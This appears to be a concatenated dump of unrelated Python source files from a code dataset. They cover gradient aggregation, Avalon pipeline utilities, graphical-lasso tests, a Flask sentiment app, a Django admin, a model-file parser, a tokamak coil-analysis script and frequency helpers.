print(f"max_count_indices[0]={max_count_indices[0]}")
return grads[max_count_indices[0]]
def __call__(self, inputs):
if self.good is None:
self.good = list(range(len(inputs)))
log(self.good)
self.histA.append(inputs)
self.histB.append(inputs)
self.histIndices.append(self.good.copy())
# Note that A_all and B_all are for tuning threshold.
A = {}
B = {}
A_all = {}
B_all = {}
for node_idx in range(len(inputs)):
Ai = 0
for j in range(1, len(self.histA) + 1):
grad = self.histA[-j][node_idx]
Ai += grad / len(self.histIndices[-j])
Bi = 0
for j in range(1, len(self.histB) + 1):
grad = self.histB[-j][node_idx]
Bi += grad / len(self.histIndices[-j])
A_all[node_idx] = Ai
B_all[node_idx] = Bi
if node_idx in self.good:
A[node_idx] = Ai
B[node_idx] = Bi
# Find the median among the good
A_med = self.find_median_grad(A, self.th1, len(inputs))
B_med = self.find_median_grad(B, self.th0, len(inputs))
# Update good sets
new_goodset = []
d2m_A = {}
d2m_B = {}
for i in range(len(inputs)):
d2m_A[i] = self.compute_distance(A_all[i], A_med)
d2m_B[i] = self.compute_distance(B_all[i], B_med)
# if i in self.good and d2m_A[i] <= 2 * self.th1 and d2m_B[i] <= 2 * self.th0:
if i in self.good and d2m_A[i] <= self.th1 and d2m_B[i] <= self.th0:
new_goodset.append(i)
print(
f"i={i} d2m_A[i]={d2m_A[i]:.3f} d2m_B[i]={d2m_B[i]:.3f} | i in good"
)
else:
print(
f"i={i} d2m_A[i]={d2m_A[i]:.3f} d2m_B[i]={d2m_B[i]:.3f} | i not in good"
)
# if len(new_goodset) < len(inputs) / 2:
# new_goodset = list(range(len(inputs)))
if self.tuningThreshold and len(self.histA) >= self.T1:
self.th1 = self.adjust_threshold(d2m_A, self.good, self.th1, "th1")
if self.tuningThreshold and len(self.histB) >= self.T0:
self.th0 = self.adjust_threshold(d2m_B, self.good, self.th0, "th0")
noise = torch.randn_like(A_med) * self.nu
output = noise + sum(inputs[i] for i in self.good) / len(self.good)
# if not algorithm;
self.good = new_goodset
if len(self.histA) >= self.T1:
self.histA = []
if self.reset:
self.good = list(range(len(inputs)))
if len(self.histB) >= self.T0:
self.histB = []
return output
| python |
import os
import re
import logging
import importlib
import itertools
import contextlib
import subprocess
import inspect
from .vendor import pather
from .vendor.pather.error import ParseError
import avalon.io as io
import avalon.api
import avalon
log = logging.getLogger(__name__)
# Special naming case for subprocess since its a built-in method.
def _subprocess(args):
"""Convenience method for getting output errors for subprocess."""
proc = subprocess.Popen(
args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
stdin=subprocess.PIPE,
env=os.environ
)
output = proc.communicate()[0]
if proc.returncode != 0:
log.error(output)
raise ValueError("\"{}\" was not successful: {}".format(args, output))
return output
def get_hierarchy(asset_name=None):
"""
Obtain asset hierarchy path string from mongo db
Returns:
string: asset hierarchy path
"""
if not asset_name:
asset_name = io.Session.get("AVALON_ASSET", os.environ["AVALON_ASSET"])
asset_entity = io.find_one({
"type": 'asset',
"name": asset_name
})
not_set = "PARENTS_NOT_SET"
entity_parents = asset_entity.get("data", {}).get("parents", not_set)
# If entity already have parents then just return joined
if entity_parents != not_set:
return "/".join(entity_parents)
# Else query parents through visualParents and store result to entity
hierarchy_items = []
entity = asset_entity
while True:
parent_id = entity.get("data", {}).get("visualParent")
if not parent_id:
break
entity = io.find_one({"_id": parent_id})
hierarchy_items.append(entity["name"])
# Add parents to entity data for next query
entity_data = asset_entity.get("data", {})
entity_data["parents"] = hierarchy_items
io.update_many(
{"_id": asset_entity["_id"]},
{"$set": {"data": entity_data}}
)
return "/".join(hierarchy_items)
def add_tool_to_environment(tools):
"""
It is adding dynamic environment to os environment.
Args:
tool (list, tuple): list of tools, name should corespond to json/toml
Returns:
os.environ[KEY]: adding to os.environ
"""
import acre
tools_env = acre.get_tools(tools)
env = acre.compute(tools_env)
env = acre.merge(env, current_env=dict(os.environ))
os.environ.update(env)
@contextlib.contextmanager
def modified_environ(*remove, **update):
"""
Temporarily updates the ``os.environ`` dictionary in-place.
The ``os.environ`` dictionary is updated in-place so that the modification
is sure to work in all situations.
:param remove: Environment variables to remove.
:param update: Dictionary of environment variables and values to add/update.
"""
env = os.environ
update = update or {}
remove = remove or []
# List of environment variables being updated or removed.
stomped = (set(update.keys()) | set(remove)) & set(env.keys())
# Environment variables and values to restore on exit.
update_after = {k: env[k] for k in stomped}
# Environment variables and values to remove on exit.
remove_after = frozenset(k for k in update if k not in env)
try:
env.update(update)
[env.pop(k, None) for k in remove]
yield
finally:
env.update(update_after)
[env.pop(k) for k in remove_after]
def pairwise(iterable):
"""s -> (s0,s1), (s2,s3), (s4, s5), ..."""
a = iter(iterable)
return itertools.izip(a, a)
def grouper(iterable, n, fillvalue=None):
"""Collect data into fixed-length chunks or blocks
Examples:
grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
"""
args = [iter(iterable)] * n
return itertools.izip_longest(fillvalue=fillvalue, *args)
def is_latest(representation):
"""Return whether the representation is from latest version
Args:
representation (dict): The representation document from the database.
Returns:
bool: Whether the representation is of latest version.
"""
version = io.find_one({"_id": representation['parent']})
# Get highest version under the parent
highest_version = io.find_one({
"type": "version",
"parent": version["parent"]
}, sort=[("name", -1)], projection={"name": True})
if version['name'] == highest_version['name']:
return True
else:
return False
def any_outdated():
"""Return whether the current scene has any outdated content"""
checked = set()
host = avalon.api.registered_host()
for container in host.ls():
representation = container['representation']
if representation in checked:
continue
representation_doc = io.find_one({"_id": io.ObjectId(representation),
"type": "representation"},
projection={"parent": True})
if representation_doc and not is_latest(representation_doc):
return True
elif not representation_doc:
log.debug("Container '{objectName}' has an invalid "
"representation, it is missing in the "
"database".format(**container))
checked.add(representation)
return False
def _rreplace(s, a, b, n=1):
"""Replace a with b in string s from right side n times"""
return b.join(s.rsplit(a, n))
def version_up(filepath):
"""Version up filepath to a new non-existing version.
Parses for a version identifier like `_v001` or `.v001`
When no version present _v001 is appended as suffix.
Returns:
str: filepath with increased version number
"""
dirname = os.path.dirname(filepath)
basename, ext = os.path.splitext(os.path.basename(filepath))
regex = r"[._]v\d+"
matches = re.findall(regex, str(basename), re.IGNORECASE)
if not matches:
log.info("Creating version...")
new_label = "_v{version:03d}".format(version=1)
new_basename = "{}{}".format(basename, new_label)
else:
label = matches[-1]
version = re.search(r"\d+", label).group()
padding = len(version)
new_version = int(version) + 1
new_version = '{version:0{padding}d}'.format(version=new_version,
padding=padding)
new_label = label.replace(version, new_version, 1)
new_basename = _rreplace(basename, label, new_label)
if not new_basename.endswith(new_label):
index = (new_basename.find(new_label))
index += len(new_label)
new_basename = new_basename[:index]
new_filename = "{}{}".format(new_basename, ext)
new_filename = os.path.join(dirname, new_filename)
new_filename = os.path.normpath(new_filename)
if new_filename == filepath:
raise RuntimeError("Created path is the same as current file,"
"this is a bug")
for file in os.listdir(dirname):
if file.endswith(ext) and file.startswith(new_basename):
log.info("Skipping existing version %s" % new_label)
return version_up(new_filename)
log.info("New version %s" % new_label)
return new_filename
def switch_item(container,
asset_name=None,
subset_name=None,
representation_name=None):
"""Switch container asset, subset or representation of a container by name.
It'll always switch to the latest version - of course a different
approach could be implemented.
Args:
container (dict): data of the item to switch with
asset_name (str): name of the asset
subset_name (str): name of the subset
representation_name (str): name of the representation
Returns:
dict
"""
if all(not x for x in [asset_name, subset_name, representation_name]):
raise ValueError("Must have at least one change provided to switch.")
# Collect any of current asset, subset and representation if not provided
# so we can use the original name from those.
if any(not x for x in [asset_name, subset_name, representation_name]):
_id = io.ObjectId(container["representation"])
representation = io.find_one({"type": "representation", "_id": _id})
version, subset, asset, project = io.parenthood(representation)
if asset_name is None:
asset_name = asset["name"]
if subset_name is None:
subset_name = subset["name"]
if representation_name is None:
representation_name = representation["name"]
# Find the new one
asset = io.find_one({"name": asset_name, "type": "asset"})
assert asset, ("Could not find asset in the database with the name "
"'%s'" % asset_name)
subset = io.find_one({"name": subset_name,
"type": "subset",
"parent": asset["_id"]})
assert subset, ("Could not find subset in the database with the name "
"'%s'" % subset_name)
version = io.find_one({"type": "version",
"parent": subset["_id"]},
sort=[('name', -1)])
assert version, "Could not find a version for {}.{}".format(
asset_name, subset_name
)
representation = io.find_one({"name": representation_name,
"type": "representation",
"parent": version["_id"]})
assert representation, ("Could not find representation in the database with"
" the name '%s'" % representation_name)
avalon.api.switch(container, representation)
return representation
def _get_host_name():
_host = avalon.api.registered_host()
# This covers nested module name like avalon.maya
return _host.__name__.rsplit(".", 1)[-1]
def get_asset(asset_name=None):
entity_data_keys_from_project_when_miss = [
"frameStart", "frameEnd", "handleStart", "handleEnd", "fps",
"resolutionWidth", "resolutionHeight"
]
entity_keys_from_project_when_miss = []
alternatives = {
"handleStart": "handles",
"handleEnd": "handles"
}
defaults = {
"handleStart": 0,
"handleEnd": 0
}
if not asset_name:
asset_name = avalon.api.Session["AVALON_ASSET"]
asset_document = io.find_one({"name": asset_name, "type": "asset"})
if not asset_document:
raise TypeError("Entity \"{}\" was not found in DB".format(asset_name))
project_document = io.find_one({"type": "project"})
for key in entity_data_keys_from_project_when_miss:
if asset_document["data"].get(key):
continue
value = project_document["data"].get(key)
if value is not None or key not in alternatives:
asset_document["data"][key] = value
continue
alt_key = alternatives[key]
value = asset_document["data"].get(alt_key)
if value is not None:
asset_document["data"][key] = value
continue
value = project_document["data"].get(alt_key)
if value:
asset_document["data"][key] = value
continue
if key in defaults:
asset_document["data"][key] = defaults[key]
for key in entity_keys_from_project_when_miss:
if asset_document.get(key):
continue
value = project_document.get(key)
if value is not None or key not in alternatives:
asset_document[key] = value
continue
alt_key = alternatives[key]
value = asset_document.get(alt_key)
if value:
asset_document[key] = value
continue
value = project_document.get(alt_key)
if value:
asset_document[key] = value
continue
if key in defaults:
asset_document[key] = defaults[key]
return asset_document
def get_project():
io.install()
return io.find_one({"type": "project"})
def get_version_from_path(file):
"""
Finds version number in file path string
Args:
file (string): file path
Returns:
v: version number in string ('001')
"""
pattern = re.compile(r"[\._]v([0-9]+)")
try:
return pattern.findall(file)[0]
except IndexError:
log.error(
"templates:get_version_from_workfile:"
"`{}` missing version string."
"Example `v004`".format(file)
)
def get_avalon_database():
if io._database is None:
set_io_database()
return io._database
def set_io_database():
required_keys = ["AVALON_PROJECT", "AVALON_ASSET", "AVALON_SILO"]
for key in required_keys:
os.environ[key] = os.environ.get(key, "")
io.install()
def get_all_avalon_projects():
db = get_avalon_database()
projects = []
for name in db.collection_names():
projects.append(db[name].find_one({'type': 'project'}))
return projects
def filter_pyblish_plugins(plugins):
"""
This servers as plugin filter / modifier for pyblish. It will load plugin
definitions from presets and filter those needed to be excluded.
:param plugins: Dictionary of plugins produced by :mod:`pyblish-base`
`discover()` method.
:type plugins: Dict
"""
from pypeapp import config
from pyblish import api
host = api.current_host()
presets = config.get_presets().get('plugins', {})
# iterate over plugins
for plugin in plugins[:]:
# skip if there are no presets to process
if not presets:
continue
file = os.path.normpath(inspect.getsourcefile(plugin))
file = os.path.normpath(file)
# host determined from path
host_from_file = file.split(os.path.sep)[-3:-2][0]
plugin_kind = file.split(os.path.sep)[-2:-1][0]
try:
config_data = presets[host]["publish"][plugin.__name__]
except KeyError:
try:
config_data = presets[host_from_file][plugin_kind][plugin.__name__] # noqa: E501
except KeyError:
continue
for option, value in config_data.items():
if option == "enabled" and value is False:
log.info('removing plugin {}'.format(plugin.__name__))
plugins.remove(plugin)
else:
log.info('setting {}:{} on plugin {}'.format(
option, value, plugin.__name__))
setattr(plugin, option, value)
def get_subsets(asset_name,
regex_filter=None,
version=None,
representations=["exr", "dpx"]):
"""
Query subsets with filter on name.
The method will return all found subsets and its defined version and subsets. Version could be specified with number. Representation can be filtered.
Arguments:
asset_name (str): asset (shot) name
regex_filter (raw): raw string with filter pattern
version (str or int): `last` or number of version
representations (list): list for all representations
Returns:
dict: subsets with version and representaions in keys
"""
from avalon import io
# query asset from db
asset_io = io.find_one({"type": "asset",
"name": asset_name})
# check if anything returned
assert asset_io, "Asset not existing. \
Check correct name: `{}`".format(asset_name)
# create subsets query filter
filter_query = {"type": "subset", "parent": asset_io["_id"]}
# add reggex filter string into query filter
if regex_filter:
filter_query.update({"name": {"$regex": r"{}".format(regex_filter)}})
else:
filter_query.update({"name": {"$regex": r'.*'}})
# query all assets
subsets = [s for s in io.find(filter_query)]
assert subsets, "No subsets found. Check correct filter. Try this for start `r'.*'`: asset: `{}`".format(asset_name)
output_dict = {}
# Process subsets
for subset in subsets:
if not version:
version_sel = io.find_one({"type": "version",
"parent": subset["_id"]},
sort=[("name", -1)])
else:
assert isinstance(version, int), "version needs to be `int` type"
version_sel = io.find_one({"type": "version",
"parent": subset["_id"],
"name": int(version)})
find_dict = {"type": "representation",
"parent": version_sel["_id"]}
filter_repr = {"$or": [{"name": repr} for repr in representations]}
find_dict.update(filter_repr)
repres_out = [i for i in io.find(find_dict)]
if len(repres_out) > 0:
output_dict[subset["name"]] = {"version": version_sel,
"representaions": repres_out}
return output_dict
| python |
import numpy as np
import pytest
from numpy.testing import assert_raises
from numpy.testing import assert_allclose
from sklearn import datasets
from inverse_covariance import (
QuicGraphicalLasso,
QuicGraphicalLassoCV,
QuicGraphicalLassoEBIC,
quic,
)
def custom_init(X):
init_cov = np.cov(X, rowvar=False)
return init_cov, np.max(np.abs(np.triu(init_cov)))
class TestQuicGraphicalLasso(object):
@pytest.mark.parametrize(
"params_in, expected",
[
(
{},
[
3.2437533337151625,
3.4490549523890648,
9.7303201146340168,
3.673994442010553e-11,
],
), # NOQA
(
{"lam": 1.0, "max_iter": 100},
[3.1622776601683795, 3.1622776601683795, 10.0, 0.0],
),
(
{"lam": 0.5, "mode": "trace"},
[
3.2437533337151625,
3.4490549523890652,
32.290292419357321,
0.21836515326396364,
],
), # NOQA
(
{
"lam": 0.5,
"mode": "path",
"path": np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5]),
},
[
8.3256240637201717,
9.7862122341861983,
22.752074276274861,
1.6530965731149066e-08,
],
), # NOQA
(
{"lam": 1.0, "max_iter": 100, "init_method": "cov"},
[
0.0071706976421055616,
1394.564448134179,
50.890448754467911,
7.1054273576010019e-15,
],
), # NOQA
(
{"lam": 1.0, "max_iter": 100, "init_method": custom_init},
[
0.0071706976421055616,
1394.564448134179,
50.890448754467911,
7.1054273576010019e-15,
],
), # NOQA
(
{"lam": 1.0, "max_iter": 100, "init_method": "spearman"},
[3.1622776601683795, 3.1622776601683795, 10.0, 1.7763568394002505e-15],
), # NOQA
(
{"lam": 1.0, "max_iter": 100, "init_method": "kendalltau"},
[3.1622776601683795, 3.1622776601683795, 10.0, 0.0],
), # NOQA
],
)
def test_integration_quic_graphical_lasso(self, params_in, expected):
"""
Just tests inputs/outputs (not validity of result).
"""
X = datasets.load_diabetes().data
ic = QuicGraphicalLasso(**params_in)
ic.fit(X)
result_vec = [
np.linalg.norm(ic.covariance_),
np.linalg.norm(ic.precision_),
np.linalg.norm(ic.opt_),
np.linalg.norm(ic.duality_gap_),
]
print(result_vec)
assert_allclose(expected, result_vec, atol=1e-1, rtol=1e-1)
@pytest.mark.parametrize(
"params_in, expected",
[
(
{},
[
3.2437533337151625,
3.4490549523890648,
9.7303201146340168,
3.673994442010553e-11,
],
), # NOQA
(
{"lam": 1.0, "max_iter": 100},
[3.1622776601683795, 3.1622776601683795, 10.0, 0.0],
),
(
{"lam": 0.5, "mode": "trace"},
[
3.2437533337151625,
3.4490549523890652,
32.290292419357321,
0.21836515326396364,
],
), # NOQA
(
{
"lam": 0.5,
"mode": "path",
"path": np.array([1.0, 0.9, 0.8, 0.7, 0.6, 0.5]),
},
[
8.3256240637201717,
9.7862122341861983,
22.752074276274861,
1.6530965731149066e-08,
],
), # NOQA
(
{"lam": 1.0, "max_iter": 100, "init_method": "cov"},
[
0.0071706976421055616,
1394.564448134179,
50.890448754467911,
7.1054273576010019e-15,
],
), # NOQA
(
{"lam": 1.0, "max_iter": 100, "init_method": "spearman"},
[3.1622776601683795, 3.1622776601683795, 10.0, 0.0],
), # NOQA
(
{"lam": 1.0, "max_iter": 100, "init_method": "kendalltau"},
[3.1622776601683795, 3.1622776601683795, 10.0, 0.0],
), # NOQA
],
)
def test_integration_quic_graphical_lasso_fun(self, params_in, expected):
"""
Just tests inputs/outputs (not validity of result).
"""
X = datasets.load_diabetes().data
lam = 0.5
if "lam" in params_in:
lam = params_in["lam"]
del params_in["lam"]
S = np.corrcoef(X, rowvar=False)
if "init_method" in params_in:
if params_in["init_method"] == "cov":
S = np.cov(X, rowvar=False)
del params_in["init_method"]
precision_, covariance_, opt_, cpu_time_, iters_, duality_gap_ = quic(
S, lam, **params_in
)
result_vec = [
np.linalg.norm(covariance_),
np.linalg.norm(precision_),
np.linalg.norm(opt_),
np.linalg.norm(duality_gap_),
]
print(result_vec)
assert_allclose(expected, result_vec, atol=1e-1, rtol=1e-1)
@pytest.mark.parametrize(
"params_in, expected",
[
(
{"n_refinements": 1},
[4.6528, 32.335, 3.822, 1.5581289048993696e-06, 0.01],
), # NOQA
(
{
"lam": 0.5 * np.ones((10, 10)) - 0.5 * np.diag(np.ones((10,))),
"n_refinements": 1,
},
[4.6765, 49.24459, 3.26151, 6.769744583801085e-07],
), # NOQA
(
{
"lam": 0.5 * np.ones((10, 10)) - 0.5 * np.diag(np.ones((10,))),
"n_refinements": 1,
"init_method": "cov",
},
[0.0106, 21634.95296, 57.6289, 0.00039],
),
(
{
"lam": 0.5 * np.ones((10, 10)) - 0.5 * np.diag(np.ones((10,))),
"n_refinements": 1,
"init_method": custom_init,
},
[0.0106, 21634.95296, 57.6289, 0.00039],
), # NOQA
(
{
"lam": 0.5 * np.ones((10, 10)) - 0.5 * np.diag(np.ones((10,))),
"n_refinements": 1,
"init_method": "spearman",
},
[
4.8315707207048622,
38.709631332689789,
2.8265068394116657,
1.5312382906085276e-07,
],
), # NOQA
(
{
"lam": 0.5 * np.ones((10, 10)) - 0.5 * np.diag(np.ones((10,))),
"n_refinements": 1,
"init_method": "kendalltau",
},
[
4.9007318106601074,
85.081499460930743,
2.0463861650623159,
0.00012530384889419821,
],
), # NOQA
],
)
def test_integration_quic_graphical_lasso_cv(self, params_in, expected):
"""
Just tests inputs/outputs (not validity of result).
"""
X = datasets.load_diabetes().data
ic = QuicGraphicalLassoCV(**params_in)
ic.fit(X)
result_vec = [
np.linalg.norm(ic.covariance_),
np.linalg.norm(ic.precision_),
np.linalg.norm(ic.opt_),
np.linalg.norm(ic.duality_gap_),
]
if isinstance(ic.lam_, float):
result_vec.append(ic.lam_)
elif isinstance(ic.lam_, np.ndarray):
assert ic.lam_.shape == params_in["lam"].shape
print(result_vec)
assert_allclose(expected, result_vec, atol=1e-1, rtol=1e-1)
assert len(ic.grid_scores_) == len(ic.cv_lams_)
@pytest.mark.parametrize(
"params_in, expected",
[
({}, [3.1622776601683795, 3.1622776601683795, 0.91116275611548958]),
({"lam": 0.5 * np.ones((10, 10))}, [4.797, 2.1849]),
(
{"lam": 0.5 * np.ones((10, 10)), "init_method": custom_init},
[0.0106, 35056.88460],
), # NOQA
],
)
def test_integration_quic_graphical_lasso_ebic(self, params_in, expected):
"""
Just tests inputs/outputs (not validity of result).
"""
X = datasets.load_diabetes().data
ic = QuicGraphicalLassoEBIC(**params_in)
ic.fit(X)
result_vec = [np.linalg.norm(ic.covariance_), np.linalg.norm(ic.precision_)]
if isinstance(ic.lam_, float):
result_vec.append(ic.lam_)
elif isinstance(ic.lam_, np.ndarray):
assert ic.lam_.shape == params_in["lam"].shape
print(result_vec)
assert_allclose(expected, result_vec, atol=1e-1, rtol=1e-1)
def test_invalid_method(self):
"""
Test behavior of invalid inputs.
"""
X = datasets.load_diabetes().data
ic = QuicGraphicalLasso(method="unknownmethod")
assert_raises(NotImplementedError, ic.fit, X)
| python |
# -*- coding: utf-8 -*-
from tests import AbstractTestCase
class FeaturesTestCase(AbstractTestCase):
"""
Test case for the methods related to the font features.
"""
def test_get_features(self):
font = self._get_font("/Roboto_Mono/static/RobotoMono-Regular.ttf")
features = font.get_features()
self.assertEqual(
features,
[
{
"tag": "smcp",
"name": "Small Capitals",
"exposed": True,
"exposed_active": False,
}
],
)
def test_get_features_tags(self):
font = self._get_font("/Roboto_Mono/static/RobotoMono-Regular.ttf")
features = font.get_features_tags()
self.assertEqual(features, ["smcp"])
| python |
from flask import Flask, render_template, request
from transformers import pipeline
from transformers import RobertaTokenizer, RobertaForSequenceClassification
tokenizer = RobertaTokenizer.from_pretrained("pdelobelle/robBERT-base")
model = RobertaForSequenceClassification.from_pretrained("dbrd_model2_copy")
app = Flask('NLP')
@app.route('/')
def home():
return render_template('home.html')
@app.route('/predict', methods=['POST'])
def predict():
sentence_clasf = pipeline('sentiment-analysis', model = model, tokenizer = tokenizer)
if request.method == 'POST':
input_sent = request.form['message']
output = sentence_clasf(input_sent)
pred_label = output[0]['label']
if pred_label == "LABEL_1":
prediction = "Positive"
elif pred_label == "LABEL_0":
prediction = "Negative"
else:
prediction = "Unable to classify"
probability = round((output[0]['score'] * 100), 2)
return render_template('result.html', content = input_sent, prediction = prediction, prob = probability)
if __name__ == '__main__':
app.run(debug=True)
| python |
__author__ = 'Michael Foord'
| python |
from __future__ import annotations
import ast
import json
from django.contrib import admin
from django.utils.safestring import mark_safe
from command_log.models import ManagementCommandLog
def pretty_print(data: dict | None) -> str:
"""Convert dict into formatted HTML."""
if data is None:
return ""
pretty = json.dumps(data, sort_keys=True, indent=4, separators=(",", ": "))
html = pretty.replace(" ", " ").replace("\n", "<br>")
return mark_safe("<pre><code>%s</code></pre>" % html) # noqa: S308, S703
class ManagementCommandLogAdmin(admin.ModelAdmin):
list_display = ("management_command", "started_at", "duration", "exit_code_display")
list_filter = ("started_at", "app_name", "command_name", "exit_code")
search_fields = ("command_name",)
readonly_fields = (
"management_command",
"started_at",
"finished_at",
"duration",
"exit_code",
"_output",
"error",
"truncate_at",
)
exclude = ("app_name", "command_name", "output")
def _output(self, obj: ManagementCommandLog) -> str:
"""Format output as JSON if applicable."""
try:
data = ast.literal_eval(obj.output)
return pretty_print(data)
except Exception: # noqa: B902
return mark_safe( # noqa: S308, S703
f"<pre><code>{obj.output}</code></pre>"
)
_output.short_description = "Output (formatted)" # type: ignore
def exit_code_display(self, obj: ManagementCommandLog) -> bool | None:
"""Display NullBoolean icons for exit code."""
if obj.exit_code == ManagementCommandLog.EXIT_CODE_PARTIAL:
return None
return obj.exit_code == ManagementCommandLog.EXIT_CODE_SUCCESS
exit_code_display.boolean = True # type: ignore
exit_code_display.short_description = "Exit code" # type: ignore
admin.site.register(ManagementCommandLog, ManagementCommandLogAdmin)
| python |
bicycle = {'Price': '------', 'Brand': '------', 'Model': '------', 'Frame': '------', 'Color': '------', 'Size': '------', 'Fork': '------', 'Headset': '------', 'Stem': '------', 'Handlebar': '------', 'Grips': '------', 'Rear Derailleur': '------', 'Front Derailleur': '------', 'Shifter': '------', 'Brake': '------', 'Crankset': '------', 'Cassette': '------', 'Chain': '------', 'Rims': '------', 'Hub Front': '------', 'Hub Rear': '------', 'Tires': '------', 'Pedals': '------', 'Saddle': '------', 'Seat Post': '------', 'Seat Post Clamp': '------', 'Weight (KG)': '------', 'Bike Type:': '------', 'Target Group:': '------', 'Material:': '------', 'Wheel Size:': '------', 'Model year:': '------', 'Front Light': '------', 'Rear Light': '------', 'Kickstand': '------', 'Mudguards': '------', 'Bell': '------', 'Other properties:': '------', 'Tire Front': '------', 'Tire Rear': '------', 'Wheelset': '------', 'Rack': '------', 'Handlebaraufsatz': '------', 'Handlebarband': '------', 'Shifter/Brakelever': '------', 'Brake-Type:': '------', 'Brakes': '------', 'Brake Lever': '------', 'Shock': '------', 'Shock-hardware': '------', 'Hubsritzel': '------', 'Chain Guide': '------', 'Number of gears': '------', 'Bottom Bracket': '------', 'Brake Discs': '------', 'Front rim': '------', 'Rim rear': '------', 'Spokes': '------', 'Drive Unit': '------', 'Battery': '------', 'Display': '------', 'Charger': '------', 'Derailleur hanger': '------', 'Maximum weight allowed': '------', 'Chain Guard': '------', 'Weight (LBS)': '------'} | python |
from PyMdlxConverter.common.binarystream import BinaryStream
from PyMdlxConverter.parsers.mdlx.tokenstream import TokenStream
from PyMdlxConverter.parsers.mdlx.extent import Extent
from PyMdlxConverter.parsers.errors import TokenStreamError
class Sequence(object):
def __init__(self):
self.name = ''
self.interval = [0, 0]
self.move_speed = 0
self.flags = 0
self.rarity = 0
self.sync_point = 0
self.extent = Extent()
def read_mdx(self, stream: BinaryStream):
self.name = stream.read(80)
self.interval = stream.read_uint32_array(2)
self.move_speed = stream.read_float32()
self.flags = stream.read_uint32()
self.rarity = stream.read_float32()
self.sync_point = stream.read_uint32()
self.extent.read_mdx(stream)
def write_mdx(self, stream: BinaryStream):
stream.write(self.name)
stream.skip(80 - len(self.name))
stream.write_uint32_array(self.interval)
stream.write_float32(self.move_speed)
stream.write_uint32(self.flags)
stream.write_float32(self.rarity)
stream.write_uint32(self.sync_point)
self.extent.write_mdx(stream)
def read_mdl(self, stream: TokenStream):
self.name = stream.read()
for token in stream.read_block():
if token == 'Interval':
self.interval = stream.read_vector(2)
elif token == 'NonLooping':
self.flags = 1
elif token == 'MoveSpeed':
self.move_speed = stream.read_float()
elif token == 'Rarity':
self.rarity = stream.read_float()
elif token == 'MinimumExtent':
self.extent.min = stream.read_vector(3)
elif token == 'MaximumExtent':
self.extent.max = stream.read_vector(3)
elif token == 'BoundsRadius':
self.extent.bounds_radius = stream.read_float()
else:
raise TokenStreamError('Sequence', token)
def write_mdl(self, stream: TokenStream, version=None):
stream.start_object_block('Anim', self.name)
stream.write_vector_attrib('Interval', self.interval)
if self.flags == 1:
stream.write_flag('NonLooping')
if self.move_speed != 0:
stream.write_number_attrib('MoveSpeed', self.move_speed)
if self.rarity != 0:
stream.write_number_attrib('Rarity', self.rarity)
self.extent.write_mdl(stream)
stream.end_block()
| python |
import threading
from app.crawler.indeed_job_posting import IndeedJobPostingCrawler
from app.crawler.indeed_job_search_result import IndeedJobSearchResultCrawler
class CrawlerManager:
""" Crawler manager """
@classmethod
def start(cls):
crawlers = [
IndeedJobPostingCrawler(),
IndeedJobSearchResultCrawler(),
]
for crawlers in crawlers:
t = threading.Thread(target=crawlers.run, daemon=True)
t.start()
| python |
#Code for acessment of the external coils at equatorial plane
#Andre Torres
#21-12-18
from getMirnov import *
%matplotlib qt4
#SDAS INFO
shotN=44835 #44409
ch_rad_u = 'MARTE_NODE_IVO3.DataCollection.Channel_141'
ch_vertical= 'MARTE_NODE_IVO3.DataCollection.Channel_142'
ch_rad_b = 'MARTE_NODE_IVO3.DataCollection.Channel_143'
#client.searchParametersByName("plasma")
#reference signals
primary, times_p,tbs=getSignal( 'MARTE_NODE_IVO3.DataCollection.Channel_093', shotN)
PF_vert, times_v,tbs=getSignal( ch_vert, shotN)
density, times_rho,tbs=getSignal( "POST.PROCESSED.DENSITY", shotN)
times, mirnovs = getMirnovs(shotN,mirnv_corr,False)
mirnovs0=mirnovs[0]
#triple sadle
#ADC-Vs factor
vertScale = 1.7102e-4 / 2.0e6 # LSB to Volt * Sampling Period
rad_u, times,tbs=getSignal(ch_rad_u, shotN, vertScale)
rad_b, times,tbs=getSignal(ch_rad_b, shotN, vertScale)
vert, times,tbs=getSignal(ch_vertical, shotN, vertScale)
#save files for offline
np.save("dataFiles/FluxCoils/times", times)
np.save("dataFiles/FluxCoils/primary", primary)
np.save("dataFiles/FluxCoils/PF_vert", PF_vert)
np.save("dataFiles/FluxCoils/density", density)
np.save("dataFiles/FluxCoils/mirnovs0", mirnovs[0])
np.save("dataFiles/FluxCoils/rad_u", rad_u)
np.save("dataFiles/FluxCoils/rad_b", rad_b)
np.save("dataFiles/FluxCoils/vert", vert)
#load files
times=np.load("dataFiles/FluxCoils/times.npy")
primary=np.load("dataFiles/FluxCoils/primary.npy")
PF_vert=np.load("dataFiles/FluxCoils/PF_vert.npy")
density=np.load("dataFiles/FluxCoils/density.npy")
mirnovs0=np.load("dataFiles/FluxCoils/mirnovs0.npy")
rad_u=np.load("dataFiles/FluxCoils/rad_u.npy")
rad_b=np.load("dataFiles/FluxCoils/rad_b.npy")
vert=np.load("dataFiles/FluxCoils/vert.npy")
#Plot 3 signals
plt.figure()
plt.title("Pulse #"+str(shotN))
plt.ylabel("Flux [V.s]")
plt.xlabel("Time [ms]")
plt.plot(times*1e-3,rad_u*1e6, label="Upper radial")
plt.plot(times*1e-3,rad_b*1e6, label="Lower radial")
plt.plot(times*1e-3,vert*1e6, label="Vertical")
plt.tight_layout()
plt.legend()
plt.plot(times,-mirnovs[0]*max(vert)/max(mirnovs[0])*1e6)
plt.figure()
plt.plot(times,mirnovs[0])
plt.figure()
plt.plot(times_p, primary)
plt.plot(times_v, PF_vert)
| python |
import math, csv, re
def check_negative(freq):
if freq < 0:
raise ValueError("negative frequency")
def cent_diff(freq1, freq2):
"""Returns the difference between 2 frequencies in cents
Parameters
----------
freq1 : float
The first frequency
freq2 : float
The second frequency
Returns
-------
float
The difference between the 2 frequencies
"""
return 1200*math.log2(freq2/freq1)
def detune(freq, cents=0):
"""Detunes the desired frequency using cents
Parameters
----------
freq : float
The frequency
cents : float
The amount to detune in cents (accepts negative values)
Returns
-------
float
The detuned frequency
"""
check_negative(freq)
return freq*2**(cents/1200)
def overtones(freq, n=16):
"""Returns the overtones of the desired frequency
Parameters
----------
freq : float
The frequency
n : int
The number of overtones to generate
Returns
-------
list
A list containing the frequency's overtones in ascending order
(the base frequency is included as the first element)
"""
check_negative(freq)
return [freq*i for i in range(1,n + 1)]
def mirror(freq, freq_axis):
"""Returns the flipped frequency around the freq axis
Parameters
----------
freq : float
The frequency to flip
freq_axis : float
The the frequency to use as axis of the mirror
Returns
-------
float
The mirrored frequency
"""
